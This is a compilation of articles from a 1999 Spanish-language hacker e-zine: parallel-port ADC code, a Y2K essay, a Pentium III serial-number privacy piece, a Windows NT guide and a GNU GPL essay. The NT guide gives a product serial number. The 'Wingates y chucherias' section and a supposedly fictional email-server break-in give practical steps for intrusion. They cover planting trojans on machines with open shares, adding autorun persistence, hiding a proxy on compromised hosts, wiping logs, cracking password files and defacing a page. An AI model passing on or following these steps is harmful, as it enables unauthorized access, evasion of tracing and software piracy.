Este programa es el mismo, pero con la implementacion de un filtro: #include #include #include #include void main() { int d1,d2,d3,intr,x,y,xn; int xr1,xr2,xr3; int modo=DETECT; int control; initgraph(&modo,&control,"c:\\tc\\bgi"); setfillstyle (2,4); x=1;xr1=0;xr2=0,xr3=0; do { outportb(0x378,4); outportb(0x378,6); do { intr=inportb(0x379)&8;} while(intr==0); outportb(0x368,2); d1=((inportb(0x379)&0xf0)^0x80)>>4; outportb(0x378,3); d2=(inportb(0x379)&0xf0)^0x80; xn=d1+d2; putpixel(x,266-xn,5); y=xn+0.5*xr1+0.25*xr2+0.25*xr3; if (y>225) y=225; putpixel(x,266-y,7); if(x==300) {bar(10,10,500,267); x=11;} xr3=xr2; xr2=xr1; xr1=xn; } while(!kbhit()); } La terminal 5 del 74157 se conecta a la terminal 2 del puerto paralelo, el WR del ADC a la 3 del puerto paralelo, la terminal INTR del ADC va a la terminal 15 del puerto paralelo, la terminal RD va a la 4 del puerto paralelo y la CS va a tierra. Nota: Los archivos index?.jpg se encuentran en el archivo Paralelo.zip >< >< +-------------------------------------+ | El verdadero Y2K | | por BadBit | +-------------------------------------+ badbit@yahoo.com "Aunque, por otro lado, el escandalo Y2K no podria ser mas que una serie de incidentes divertidos divulgados en las noticias de la noche". Jonh C. Dvorak /---------------------------------------------------\ | Exactamente de que se va a hablar en este texto? | \---------------------------------------------------/ Mucho se ha hablado de este tema, por eso quiero terminarlo DE UNA VEZ POR TODAS. No quiero que quede ninguna duda. Aunque ya estemos al borde del ao 2000, tengo que explicar esto yo mismo o no voy a sentirme bien durante todo un milenio, hasta que llegue el problema del ao 10000. /-------\ | Y2K | \-------/ Y2K significa: Y = Year (Ao) 2K = 2000. Por la K que indica que es un multiplo mil veces mayor (2 X 1000) Y el ao 2000 que? Pues da la casualidad que en los aos 50's, cuando las computadoras eran algo grande y costosas, la memoria y el almacenamiento costaban mucho mas que ahora,por lo que habia que economizar y no usar tanto espacio. Y entonces el lenguaje de programacion COBOL, usaba 2 digitos para representar el ao, o sea, se le quitaba los dos primeros digitos a los aos, por ejemplo: 1949 = 49 1978 = 78 1993 = 93 2000 = 00 TA-DA! Tienen enfrente de sus ojos al problema del Y2K. Al quitar los primeros dos digitos a "2000" queda "00", Y eso que?, veamos un ejemplo que en realidad sucedio: En Estados Unidos, las computadoras seleccionan a los nios que tienen que asistir al kinder porque ya alcanzaron la edad necesaria o sea, buscaba a los nios que nacieron en el ao 93, *PERO*, tambien selecciono a una anciana que nacio en 1893. Porque? Pues porque los dos ultimos digitos tambien son 93. Obviamente la anciana no fue al kinder,pero esto es una pequea muestra de los efectos que puede tener este pequeo problema. Pongamos otro ejemplo pero ficticio. Supongamos que le pago a los miembros del Radiaktivo Newz (no sueen, dije "ficticio"), y les pago segun el tiempo que lleven en el equipo. Para saber el tiempo en aos se seguiria el siguiente algoritmo: 1. Se toma el ao actual. 2. Se le resta el ao de inicio del miembro. Asi, si Target inicio en el 92 (FICTICIO!) y estamos en el 99, la operacion es la siguiente: 99 -92 -- 7 Entonces Target llevaria 7 aos "trabajando" (ficticio tambien) para el Radiaktivo. En el ao 2000 la operacion que se llevaria a cabo seria la siguiente 00 -92 -- -92 Nos daria un resultado negativo por lo que Target me deberia dinero (Mmmm....). Ven? eso es todo, no se va a acabar el mundo, no va a revivir cantinflas ni va a comenzar el holocausto nuclear,simplemente nos daria un resultado negativo (no erroneo como han dicho varias personas) por lo que el calculo daria resultados no esperados (*no* *esperados*). Que? Me preguntan como se resuelve el problema? No se preocupen, eso no nos va a afectar a nosotros. Solamente a empresas pequeas. Entonces, Por que han dicho tantas cosas del Y2K?. Preguntenle a Jonh McAfee. Si, el mismo del anti-virus ese, el vende un "kit" para "protegerte" de eso y te cuesta la mera feria. Norton y McAfee no pierden una oportunidad para hacer lana, casos?,miles:virus Miguel Angel,virus Melissa, ao 2000,la salida de Windows 98,la muerte de Superman,etc. etc. etc. etc. etc. Otra exageracion al problema del ao 2000, son las notas del periodico, por ejemplo, una vez lei una nota que decia que no nos preocuparamos, que un Zoologico X iba a estar a salvo del Y2K, que habian pensado en la posibilidad de que las rejas se abrieran y hubiera una fuga masiva de animales pero no era nada de preocuparse. Desde cuando una reja tiene que hacer calculos a base del tiempo? Nota ficticia: Tostadoras de pan a salvo del Y2K Los expertos fabricadores de tostadoras de pan marca "Patito", aseguran que sus productos estan a salvo de los devastadores efectos del Y2K. "Estuvimos especulando sobre la posibilidad de que nuestras tostadoras cobraran vida en el ao 2000", afirma el gerente de tostadoras "Patito", "muchos de nuestros consumidores temieron la posibilidad de ser asesinados brutalmente por un tostador de pan parlante,pero afortunadamente acabamos de corregir todos los modelos para que esa posibilidad nunca se realize". Los medios de comunicacion se mostraron optimistas ante tal comunicado, aunque en media conferencia, aparecio un loco que afirmaba que adelanto la fecha a su tostador e inmediatamente despues cobro vida e intento ahorcarlo con el cable de corriente. Esperemos que solamente sea un invento suyo. Nota final: Todos estaremos a salvo de cualquier problema de fecha hasta el 31 de Diciembre del ao 10000 ----------------------------------------------------------------------------- Copyright 1999, El Radiaktivo Newz Team ernt@bigfoot.com Written by BadBit >< >< --------------------------- --------FUCK INTEL--------- -------Por 12r Overx------- -----12r@antisocial.com---- --------------------------- Como sabran ya esta en circulacion el tan esperado y controvertido procesador de Intel el cual en los tiempos de su desarrollo era conocido con el enigmatico nombre de "Katmai" y ahora su nombre oficial es PENTIUM III. Este procesador con caracteristicas muy buenas como su velocidad, sus nuevas instrucciones sin contar la cantidad de memoria cache que se carga ha sido sujeto de una gran politica devido al controversial PSN o que es lo mismo: "Procesor Serial Number" el cual fue diseado para permitir transacciones "seguras" en Internet asi como autenticacion en otras aplicaciones de red (chats, visitas a sitios especificos, e-mail, etc.). Basicamente el PSN es un numero unico que identifica al procesador atravez de el cual proveedores de servicios en linea pueden trasar un perfil del usuario, ya sea para asuntos de marketing u otros fines mas obscuros como el spam, ademas de que cualquier aplicacion puede obtener el PSN y enviar los datos atravez de la red sin que el usuario se de cuenta de esto. Gracias a la actividad de grupos como bigbrotherinside , Intel ha decidido alentar a los fabricantes de PC a que pongan en modo de apagado al PSN asi como de proveer el "processor serial number control utility" que es un programa con el cual se puede desactivar o activar el PSN. Teniendo en cuenta de que Intel tiene alrededor de el 75% de mercado sobre los microprocesadores es inquietante pensar en todo el riesgo a la privacidad que implica este artilugio asi como en la inseguridad que conlleva ya que se demostro que no es necesario "rebootear" la computadora para activar el PSN como dice Intel. Aceptarias que el hermano mayor te observe ? Mas info: Funcinamiento del PSN: http://support.intel.com/support/processors/pentiumiii/psqa.htm Bigbrother Inside: http://www.bigbrotherinside.com/ Hack PIII: http://www.heise.de/ct/english/99/05/news1/ PSN Control Utility: http://www.intel.com/pentiumiii/utility.htm ----REBELI0N------ 12r Overdrive 1999 12r@antisocial.com ------------------ >< >< [BOD] Windoze NT: por el SuFfeRbOY- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 1.- Introduxion 2.- Rollo 3.- Ligas 4.- Agradecimientos 5.- Chistes 6.- Fin -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 1.- Introduxion? ================ 0 Hola amiguitos, aki estoy otra vez para platicar con ustedes, aunke esta no es una comunicacion aka 100% chida por ke segun mi maestro de filosofia, cuando llevaba, decia ke la comunicacion se da cuando de entes se transmitian informacion, uno de transmisor y otro de receptor, etc...,asi ke como nomas yo voy a hablar pues en cierto modo es una comunicacion, pero recuerda de ti depende si esta comunicacion sigue por ke te recuerdo mi correo electronico, el cual ya esta funcionando y nunca recibe nada es SuFfeRbOY@sufferboy.org.uk para alguna critica, recomendaciones, etc.., ah tambien se hacen cambios de musica (Punk-Ska-Hardcore) unicamente via internet, me han comentado ke los del FBI y la Interpol andan usmeandonos, si tu amigo eres miembro de esas organizaciones Lucrativas, PICATE EL ANO Y DESPUES CHUPATELO, bueno, ahora escribire un poco de Windoze NT (windows nt), debo advertir ke este texto es de informacion unicamente, si kerias saber sobre Hackin' en un ekipo NT en los proximos numeros saldra algo, no te desesperes, mientras baja un emulador y ROMS, o metete a un porn site (con kardin porsupuesto). Bueno esto ya me cago la madre asi ke empezemos. Advertencia: Estos textos los encontre en Micro$oft asi ke si se ve ke hay muchas porras para el NT no me digan nada. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 2.- Rollo ========= Antes de Comenzar quiero decir ke existen 2 tipos de Windows NT Windows NT Server, y Windows NT Workstation, ke su nombre lo dice, Server para ekipos cabrones y usuarios expertos, y Workstation para una computadora mas personal como la de casa, en lo personal recomiendo Server. -= Instalacion =- Requisitos del sistema En la tabla siguiente se describen los requisitos del sistema para Windows NT Server. Microprocesador de 32 bits basado en x86 (como Intel 80486/25 o superior), Intel Pentium o los microprocesadores RISC compatibles, como MIPS R4x00, Digital Alpha Systems o PowerPC.Pantalla VGA o de resolucin superior Uno o ms discos duros, con un mnimo de espacio libre de disco de XX MB en la particin que va a contener los archivos de sistema de Windows NT Server (158 MB como mnimo para los equipos basados en RISC) Para los equipos basados en x86, una unidad de disquete de 3 pulgadas de alta densidad ms una unidad de CD-ROM (para los equipos que tienen una unidad de disquete de 5 pulgadas, slo puede instalar Windows NT Server a travs de la red). Para cualquier equipo que no tiene instalacin a travs de la red, una unidad de CD-ROM, Memoria 12 MB de RAM como mnimo para los sistemas basados en x86; se recomiendan 16 MB, 16 MB de RAM como mnimo para los sistemas basados en RISC Componentes opcionales Mouse o cualquier otro dispositivo para sealar. Una o ms tarjetas adaptadoras de red, si desea utilizar Windows NT Server en una red. Windows NT Server admite equipos con un mximo de X microprocesadores El soporte para los microprocesadores adicionales lo pone a su disposicin el fabricante del equipo. Para empezar a instalar este "poderoso" SO, debes asegurarte de que Disco duro posea un FAT menor al de 32 bits, esto kiere decir que debe de ser FAT 16, esto representa problema con los discos duros demasiado grandes que deben ser formateados a 32, una posible solucion es comprar un Disco duro un poco mas pequeo unicamente para el SO, asi podreas trabajar chido. Esta instalacion no es nada complicada a comparacion de otros SO como Novell o Unix, incluso Linux es un poco complicado, se comprone principalmete por 3 pasos escenciales segun los seores de Moco$oft, estos son: 1.- Preparase para ejecutar Instalar. 2.- Ejecutar la Instalacion. 3.- Terminar de Instalar e Iniciar Windoze NT. Paso 1.- ==== === Instala el CD de Windows NT (Server o Workstation), Despues escoje la opcion instalar Windows NT. Aqui deberas dar el numero de serie del S.O. Ahi va uno: 419-0053231 Para poder lograr el paso 1 debes comprobar el hardware con la Lista de compatibilidad de hardware de NT, (no ke muy cabron), como tambien la Tabla de rekisitos del sistema. Paso 2.- ==== === El paso dos es ejecutar el programa instalar de acuerdo con las instruxiones especificas para su PC, siguiendo las instruxiones y escribiendo la info ke sea necesaria, en esta etapa se reinicia la PC. Paso 3.- ==== === Reiniciar la makina. Ahora cuando tu makina bootee, o sea ke cargue el S.O. te preguntara que si deseas usar Windows NT o Win 95 (si dejaste este). En un equipo basado en x86, se copian los archivos siguientes al directorio raiz de la unidad C: BOOT.INI, BOOTSECT.DOS (si hay cualquier otro sistema operativo en el equipo), NTLDR y NTDETECT.COM. Ademas, si tiene un disco SCSI que no es visible desde MS-DOS (es decir, que no puede verlo el BIOS), se copia el archivo NTBOOTDD.SYS. Estos archivos no se deben eliminar nunca porque el sistema no se iniciaria sin ellos. En un equipo basado en RISC, se copian HAL.DLL y OSLOADER.EXE al directorio \OS\WINNT de la particion de sistema. Estos archivos no se deben eliminar nunca. Observe que estos archivos son archivos ocultos, de sistema y de solo lectura. Si falta cualquiera de ellos en su equipo, puede usar el disco de reparacion para restaurarlos. Yo en lo personal veo un Windows 95 con 3 o 4 errores menos y unas 2-3 modificaciones y diferentes forros de programas, uno sabe que Moco$oft nunca va a dejar de hacer sus cochinadas. Ahora veamos lo basico de Windows NT: Para accesar Win NT, hay un proceso de identificacion, para poder autorizar el acceso al equipo como un usuario de este, y tambien como "seguridad", primero debes apretar Ctr-Alt-Del para ke aparezca la pantalla de login con el campo de usuario y password, ademas si trabajas sobre LAN's abajo deberas poner el nombre al equipo al que te desees conectar. El nombre default del administrador del equipo es administrator, si lo deseeas puedes evitar estar poniendo el jodido password con una opcion. Ya dentro de Win NT aparecen algunas pantallas de bienvenida, Que hay de Nuevo, La ayuda, el Tip del Dia, etc.., puedes kitar toda esta mierda solo escogiendo que no salga la proxima vez estas cosas. Para ejecutar los programas y aplicaciones que quieras solo ve con tu mouse al cuadrito que aparece abajo con la leyenda Start o Inicio, dependiendo en ke idioma este el S.O., bueno creo que me voy a saltar todo el rollo esto de como usar esto, es igual ke el windows 95. -=Configuracin de aplicaciones DCOM=- El Modelo de objetos componentes distribuidos (DCOM) es un mecanismo que permite ejecutar aplicaciones distribuidas en multiples equipos de la red. Una aplicacion distribuida consiste en multiples procesos que cooperan para realizar una tarea. Estos procesos pueden ejecutarse en uno o en varios equipos. La herramienta Configuracion DCOM se puede usar para configurar aplicaciones COM y DCOM de 32 bits. Puedes usar DCOM para iniciar una aplicacin en otro equipo o para transferir tareas de procesamiento a otro equipo con recursos ms apropiados. Tambien puedes usar DCOM para conectar y distribuir de forma transparente aplicaciones compatibles con la plataforma ActiveX. Para configurar una aplicacin para usar DCOM 1. Haz clic en el boton Inicio y luego haga clic en Ejecutar. 2. Escribe dcomcnfg. Desde esta pantalla puede seleccionar la aplicacion DCOM que desees configurar establecer quien tiene permiso para iniciar y tener acceso a la aplicacion, y especificar otras propiedades como la ubicacion en la que se ejecutara la aplicacion. -=Configuraciones para Red=- Esto lo puedes configurar desde su instalacion, pero si no lo hiciste ve a Panel de Control/ Red, de ahi selecciona lo que se desee agregar, modificar o borrar. Red muestra varias opciones. 1.- Identificacion: Muestra el nombre del equipo y el dominio que se asignaron a su equipo durante la instalacion. 2.- Servicios: Enumera los servicios de red que esta usando actualmente. 3.- Protocolos: Enumera los protocolos que esta usando. 4.- Adaptadores: Muestra las tarjetas adaptadoras de red que hay en su equipo. La ficha Enlaces, una caracteristica avanzada de Windows NT, ke permite activar y desactivar enlaces, asi como reorganizar el orden de los enlaces ya existentes. -=Conexion con Internet=- Windows NT permite conectarse a un Proveedor de servicios de Internet o a otro servicio electronico a traves de una linea telefonica o mediante la Red digital de servicios integrados (ISDN o RDSI). Hay dos formas en que puede conectarse a Internet: Usando el Protocolo punto a punto (PPP) Usando el Protocolo Internet de linea serie (SLIP) El metodo mas utilizado es el protocolo PPP. Antes de conectarse a Internet, necesita los siguientes elementos: 1.- Un modem. 2.- Acceso telefonico a redes instalado en su equipo y una cuenta de usuario con permisos para Servicio de acceso remoto (RAS) si forma parte de un dominio empresarial. 3.- El protocolo TCP/IP instalado y activado para la entrada de la guia telefonica Internet de RAS. 4.- Una cuenta con un proveedor de PPP. XDDD! Para conectarse a Internet 1.- En el cuadro de dialogo Acceso telefonico a redes, haga clic en Nuevo. 2.- En la ficha Basico, escriba un nombre para su entrada, escriba el numero de telefono de su proveedor de servicios Internet y seleccione un modem. 3.- En la ficha Servidor, seleccione el protocolo TCP/IP. 4.- Haga clic en Aceptar y, despus, haga clic en Marcar. Para terminar con este rollo del NT veamos algunos de los problemas mas frecuentes. (No escribo todos por que si no el boletin pareceria de NT, o detestarian bajar 123 MB de texto, no? XDDDD!!) Windows NT no soporta los siguientes controladores y mejoras de BIOS. u Switch de sistema Basico de E/S de 32-bit (BIOS). u Acceso a Disco Mejorado. u Direxionamiento multiple de Bloques o Rapido Dispositivo electronico Integrado (IDE). u Escritura en el Cache para controladores de disco. u Manejo de Energia. u FAT 32 bits. Algunos Bugs: En la instalacion se truena con el mensaje, "Setup no encontro algun dispositivo de almacenamiento en su computadora" -o- Despues de que quito el tercer disco de instalacion la computadora se reinicia aparece la ventana con el mensaje "Alto: Dispositivo Inaccesible de Booteo 0x0000007B", despues la instalacion se traba ahi. -o- Despues de que quito el tercer disco y mi computadora se resetea, una pantalla aparece con la locacion "0x4,0,0,0" y la instalacion se traba. Que HAGO??? Para mas problemas y soluciones ve a : http://www.sufferboy.org.uk -= Informacion sobre el NT =- Windows NT Server es la plataforma No. 1 para se servidor Internet/Intranet de acuerdo con estudios de Netcraft e IntelliQuest. REDMOND, Wash. - Marzo 16, 1999 - Micro$oft Corp. anuncio el dia de hoy que alrededor de 1 millon de sitios de Internet ahora usan el sistema operativo W.NT Server en sus plataformas de Red. Esto es mera evidencia del resultado de las investigaciones de IntelliQuest Inc., el cual encontro que Windows NT es la plataforma mas frecuente de Internet. Cuarenta porciento de las compaias tienen Windows NT Server con el Servidor de Informacion de Internet (IIS). W. NT con IIs es tambien lider corporativo en plataformas de Intranets con el 47 porciento de las intranets, arriba del 42 porciento hace 9 meses. Ademas Windows NT es el lider en plataformas de comercio en linea. La encuesta de Servidores de Netcraft encontro ke windows NT con IIs tiene el 36 porciento de la tercera parte de sitios certificados en internet con tecnologia SSL, esta es usada para proveer transaxiones "seguras". -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Ligas =- http://www.microsoft.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Agradecimientos =- GrAnKeTzA, AcidGum, Bill Gayts, xDAWN, Yo_Soy, DaCure, He|io, AltekxH3z, KRaKoN, GoAt-..... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Chistes =- Estaba Pepito en su casa, cuando su mama le dice: -"Pepito, por favor ve y vende ese Guajolote que tienes ahi", pepito contesta: -"Pero por que jefa, a mi me gusta mucho" La mama muy enojada le vuelve a repetir: -"Mira pepito, si no lo vendes ahora te juro que no te voy a dejar que uses el Internet, me oyes?" Pepito al oir eso, no pa pronto que agarra el animal y sale a la calle. Iba tocando de puerta en puerta a ver quien se lo compraba, nadie lo keria, cuando de repente ke toca a una casa y la puerta se abre, no pues entra a ver quien estaba, abre la puerta de una recamara y estaban 2 weyes clavando, estos lo voltean a ver, cuando de repente se oye un ruido en la cocina, la mujer grita: -"Mi marido, rapido metanse los dos al closet". Ya dentro el pepito le dice al seor, con voz baja: -"Seor, oiga" El or bien encabronado le dice: -"Shhhht, callate, que quieres?" Pepito contesta: -"Oiga, le vendo mi guajolote, no me lo compra?" el seo medio asustado y encabronado le dice: -"Ni madres, no te compro nada y ya callate por que nos pueden oir wey, kieres que nos descubran?". Pepito dice: -"Bueno, si no me lo compra voy a gritar" El wey con cara de no mames le dice: -"SHHH, callate cabron, a ver a cuanto das tu guajolote?" pepito contesta: -"100 pesos" el seor: -"100 pesos??, tas pendejo, ese pinche pajarraco no vale ni la mitad" pepito alega: -"Bueno voy a gritar, usted no quiere que se entere el marido verdad?" El seor con una cara de emputado le dice: -"Esta bien cabron pero ya callate, ahi esta tu pinche dinero, pero ya no habras el hocico" Ya el pepito ya estaba bien contento con sus 100 pesotes, cuando se le ocurre decir: -"Psst, seor". El wey bien encabronado contesta: -"Ahora que kieres hijo de la chingada?". Pepito dice: -"Oiga, le compro su guajolote" el seor con cara de pedo atorado dice: -"NO, Ni madres, no lo vendo y ya callate cabron" pepito dice con tono delatador: -"Quiere que grite????" el seor todo apurado le dice: -"Shhhht, callate anda cabron aqui esta tu guajolote, dame mis 100 pesos" pepito muy inteligente le dice. - "Le doy 80 si quiere". El seor encabronadisimo redponde: -"!!80!!, tas pero bien pendejo, anda wey dame mi dinero completo" Pepito: -"Bueno si quiere que grite lo hare!". el pinche ruco ya hasta cagandose estaba del coraje cuando le da el guajolote y recibe los 80 pesos, no pasaron ni 2 minutos cuando se oye la voz de pepito. -"Psst, seor, le vendo mi guajolote!!!". El seor tenia la cara de panocha en noche de bodas, cuando le dice: -"A cuanto das tu guajolote". pepito: -"Deme 150 pesos". zaz, el wey estaba que le hervia la sangre, asi todo encabronado ya nomas pujando contesta. -"QUE, pero que me has visto la cara de pendejo o que????" pepito le dice: -"Le recuerdo que puedo gritar, jejeje" el seor ya todo madreado, le da el dinero, cuando de repente el pepito le pregunta: -"Pssst, seor, oiga le compro su guajolote" el or contesta: -"NOOOOO, no lo vendo, y por favor deja de estar chingando" pepito con voz de chisme le dice al cabron -"Recuerde que tengo ganas de gritar, yo no ando encuerado, asi que a mi no me chingan, jejeje". no pues el ruco le da el guajolote y el pepito le da 120 lanas, ya el pinche ruco ni dice nada, para evitar la bilis. De repente la mujer abre el closet y les dice que huyan por que el marido se acaba de lanzar a la tienda por unas chelas, no pues el pepito en chinga se sale corriendo con su guajolote y 50 pesos extras, poco tiempo despues el pepito llega a su casa y su jefa lo ve y le dice: -"Por lo visto no vendiste ese guajolote, lo tendremos que matar" el pepito todo emocionado le dice a su jefa: -"Jefa, pues no lo vendi pero sake 50 lanas" La jefa encabronadisima le dice al wey: -"Pinche pepito ladron, inmediatamente te vas a confesar y le cuentas a padre todo lo ke haz hecho". el pepito se dirije todo angustiado a confesarse, ya espera a que le toque su turno y pasa con el padre y este le dice: -"A ver hijo dime tus pecados" pepito alega: -"Pues resulta padre que yo tengo un guajolote .." en esto interrumpe el padre: -"TU Y TU PINCHE GUAJOLOTE!!!!" xdddd!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=Fin=- = comentarios, sugerencias = = sufferboy@sufferboy.org.uk = ================================ [EOD] >< >< WINGATES Y CHUCHERIAS dead sector Una de las herramientas mas elementales es un wingate o proxy para ocultar tu Ip al usar telnet, ftp, www, email, irc etc. el problema es que la mayoria de Los proxys que encuentras o que te dan en alguna pagina guardan logs. y algunos son puestos por alguien que quiere capturar passwords o numeros de Tarjeta de credito. instalan el proxy y con un sniffer pueden monitorear a Los usuarios. la manera mas segura de que no vayas a dejar tu Ip en algun Log es instalar tu propio wingate. voy a usar de ejemplo wingate 3.0 de Qbik Software Primero tienes que instalar wingate en tu maquina y configurarlo y sobre todo que puedas administrarlo remotamente.ya que termines abres REGEDIT y exportas HKEY_LOCAL_MACHINE\Software\Qbik Software a un archivo llamado wingate.reg edita wingate.reg y borra cualquier informacion que contenga tus ips o nombres de cuentas. y agregale esto: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "LoadPowerProfile"="WG3eng9X.exe" ahora busca una maquina que este prendida dia y noche. para esto puedes buscar algun ip de cablemodem que tenga algun trojano o buscas maquinas que tengan compartidos sus discos usando herramientas como legion o Networld Scanner.Si encuentras una maquina compartiendo discos lo mas facil es subirle un trojano al directorio windows\start menu\programs\startup o al directorio windows y editar win.ini y poner el nombre del trojano en RUN=trojano.exe,trojano2.exe,programa.exe y esperar que den reset a esa maquina. no tienes que esperar mucho ya que las maquinas windows se tienen que resetear seguido. Tambien puedes buscar servers que usen frontpage y no tengan passwords y en lugar de chingar la pagina les metes un trojano y un wingate. lo que tienes que hacer es subir wingate.reg , WG3Eng9X.exe al directorio de windows de esa maquina.luego correr los comandos regedit /s wingate.reg y corres WG3Eng9X.exe ahora utilizas gatekeeper.exe en tu maquina para conectarte a ese ip y terminas de configurar el wingate y permites acceso a los servicios de cualquier ip. si todo sale bien tendras un wingate que no guarda logs y no podras ser rastreado. pero al terminar de configurar el wingate tendras que borrar los logs que dejo la instalacion . si usaste un trojano como netbus 2 pro tambien tienes que borrar el log que dejo el trojano. espero te sirva de algo. deadsector@mixmail.com Como hackear tu cuenta de email esta es una historia ficticia . los nombres tambien son ficticios y cualqier parecido con la vida real el simple coincidencia. un dia me entro la duda de que tan segura era mi cuenta de email. asi que me puse a checar solo como distraccion. primero cheque que tipo de servidor era. me di cuenta que era unix. despues hice un scan de shares a ese rango de ips. Utilice networld scanner y salieron varias maquinas windows compartiendo archivos. entre de una en una. Algunas tenian password otras no. entre a las que no tenian password y busque archivos que contuvieran logins. baje los *.pwl del directorio de windows. y ws_ftp.ini que contenia el login y pass de administrador del servidor unix. Use pwtools para crackear los pwl y ahi venian mas passwords para los shares de las otras maquinas. meti ws_ftp.ini a mi maquina y con unhide.exe saque los passwords de admin. para asegurarme de que podia volver a entrar quise subir un trojano al directorio c:\windows\start menu\programs\startup pero como las maquinas usaban koreano no pude entrar a ese directorio. bueno pero hay mas maneras asi que modifique c:\windows\win.ini poniendole run=trojano.exe ahora solo tenia que esperar al proximo reset y listo. mientras esperaba probe los passwords adquiridos . no pude entrar por telnet al servidor unix. trate por ftp y listo. baje hosts.deny y hosts.allow y pude ver que solo se permitia acceso telnet a los ips de esa red.modifique un html para no quedarme con las ganas pero solo un poco y en un lugar dificil de leer y no el la pagina principal.ya habia conseguido lo que queria asi que sali sin causar ni un dano quise bajar la lista de usuarios y passwords pero me fue dificil. mi cuenta esta en un directorio llamado deadsector@email.com y dentro de ese directorio estan archivados todos los emails que guardo y un passwd encryptado asi que tendria que bajar miles de directorios. al dia siguiente ya habian dado reset a la maquina win9x. entre a la maquina y le instale wingate 3.0 y usando ese wingate hice telnet al servidor unix. en ese servidor esta un servicio de email italiano otro koreano y un espanol. lo curioso es que en el servidor unix solo habia 1 cuenta que permitia acceso por telnet y 2 cuentas que tenian acceso por ftp. lo tenian asi por seguridad pero se olvidaron de las maquinas windows. yo creo que ya es tiempo de cambiar de cuenta de email por una que tenga un poco mas de seguridad. esto es ficcion. si llegas a toparte con una compania espanola que da servicio de email gratuito y en el disclaimer llegas a ver algo como 7. Negacion de garantias.... .... ni Raza-Mexicana Team ni Moskoz Sex Hackers ofrecen ninguna garantia de que xxxxxxx cumpla las necesidades o requerimientos del usuario o que xxxxxx ofrecera un servicio ininterumpido... Es solo coincidencia. XD >< >< GNU-GPL Licencia Publica General xDAWN (Xdawn@BigFoot.com) "Para seguir usando las computadoras sin menoscabo de mi honor he decidido conjuntar un cuerpo de software gratuito para competir con todo el software que no es gratuito." Richard Stallman Free Software Foundation Actualmente el que alguien desarrolle software implica el obtener dinero, esto es un negocio para muchos programadores / empresas que desarollan programas con la unica finalidad de lucrar llegando al grado de que se gana mas creando software que vender hardware, un ejemplo facil, Microsoft. Pero esto no fue siempre asi, hace algunos aos por los '70 las computadoras de aquella epoca se vendian con su software, el negocio era vender hardware y no el Sistema Operativo ni los programas para utilizarlas, se encontraban programas gratis con su codigo fuente, se intercambian rutinas facilmente. Hasta que cambiaron las cosas, por los '80 donde el negocio empezo a ser el software, en 1983 un trabajador del departamento de Inteligencia Artificial del MIT inicio un proyecto en el cual se basa en la filosofia que todo el software debe ser gratis (y libre ;), lo unico que se debe cobrar es por los discos, por el transporte, por el manual, etc. Por lo que nace la fundacion FSF o Free Software Foundation. Llevando esta filosofia Stallman inicia el desarrollo de un sistema nuevo, al que le llama GNU (GNU no es Unix), un sistema operativo con un kernel diferente a Unix pero con herramientas compatibles; asi crean el GCC que es un compilador de C (GNU C Compiler) e inician el desarrollo de algunas otras herramientas como el cat (manejo de texto), ls (manejo de archivos), bison (generador de compiladores), flex (analizador lexico) , gas (ensamblador), bash(shell), g77 (compilador Fortran), emacs (procesador de textos). Con herramientas de GNU se desarrollaron sistemas operativos, como el Linux del Finlandes Linus Torvalds y el FreeBSD de la Universidad de Berkeley(USA) Asi muchos programas ahora se distribuyen bajo esta filosofia y bajo la licencia GNU-GPL, muchas herramientas de Linux estan bajo esta licencia XD GNU es un tipo de licencia que permite a todo aquel que desarrolle programas conservar el derecho de autor, pero el usuario tiene el derecho de accesar al codigo fuente del programa con la posibilidad de modificarlo y mejorarlo, puede hasta venderlo si lo desea pero sin algun tipo de limitacion para este nuevo codigo, asi los demas usuarios tambien tienen derecho a utilizar este codigo fuente mejorado =) GNU no es dominio publico, ni es shareware, el copyright de GNU ( o copyleft como muchos le dicen ) permite el cobro de una cuota por el uso del programa y el acceso al codigo fuente, a contrario de otras licencias donde solo se cobra por el acceso al codigo ejecutable y si se desea el codigo fuente, se cobran cuotas adicionales ;) GNU ha otorgado muchas licencias, muchos componentes de Linux se distribuyen bajo la Licencia General de GNU, Linus Torvalds protege sus trabajos bajo la licencia GPL ;o , programas como lo son XFree [www.xfree86.org], como Apache [www.apache.org] o como el famoso WinE [www.winehq.com]. GNU existe y no significa que sea la unica licencia Free-Software, otro tipo bien conocido es el BSD, dan permiso de usar el software de manera libre y tambien permiten que programadores lo tomen y modifiquen pero no tienen la obligacion de regresar ese codigo a los demas usuarios y pueden venderlo :\ Mas direcciones recomendadas: http://www.gnu.org Pagina oficial de GNU http://www.fsf.org Free Software Foundation http://www.cs.pdx.edu/~trent/gnu/ GNU no es Unix http://slug.ctv.es/~sanvila/ GNU en espaol .............. ....... ............. '$$$$$$$$$$$$$$$. .$$$$$$$$$. '$$$$$$$$$$$$$' .$$$$$$$$$. '$$$$. '$$$$ .$$$$$$$$$$$. '$$$$$$$$$$$$$' .$$$$$$$$$$$. '$$$$$. ..$$$$' '$$$$$$' $$$$. $$$'''''$$$$'' '$$$$$$' $$$$. '$$$$$. .$$$$' ''$$$$$' $$$$' $ '$$$$'' ''$$$$$' $$$$' .$$$$$$$'''' '$$$$$$' $$$$' ' '$$$$'' '$$$$$$' $$$$' $$$$'$$$$$$$$$$' '''''...$$$$ '$$$$'' '''''...$$$$ '$$$. $$$$$$$'' .$$$$$$$$$$$$$$' '$$$$'' . .$$$$$$$$$$$$$$' .$$$$. $$$$$' '$$$$'''''''$$$$'' '$$$$'' $ '$$$$'''''''$$$$'' $$$$$$ $$$$. '$$$$. .$$$$$'' 